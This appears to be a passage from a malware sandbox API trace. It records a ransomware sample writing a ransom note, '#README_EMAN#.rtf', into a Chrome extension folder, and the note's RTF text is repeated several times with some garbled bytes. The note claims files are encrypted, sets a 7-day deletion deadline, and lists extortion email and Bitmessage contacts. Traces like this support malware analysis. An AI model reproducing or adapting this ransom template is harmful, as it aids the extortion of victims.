h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.638] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.638] CloseHandle (hObject=0x2c8) returned 1 [0281.638] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0281.638] GetLastError () returned 0x2 [0281.638] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w 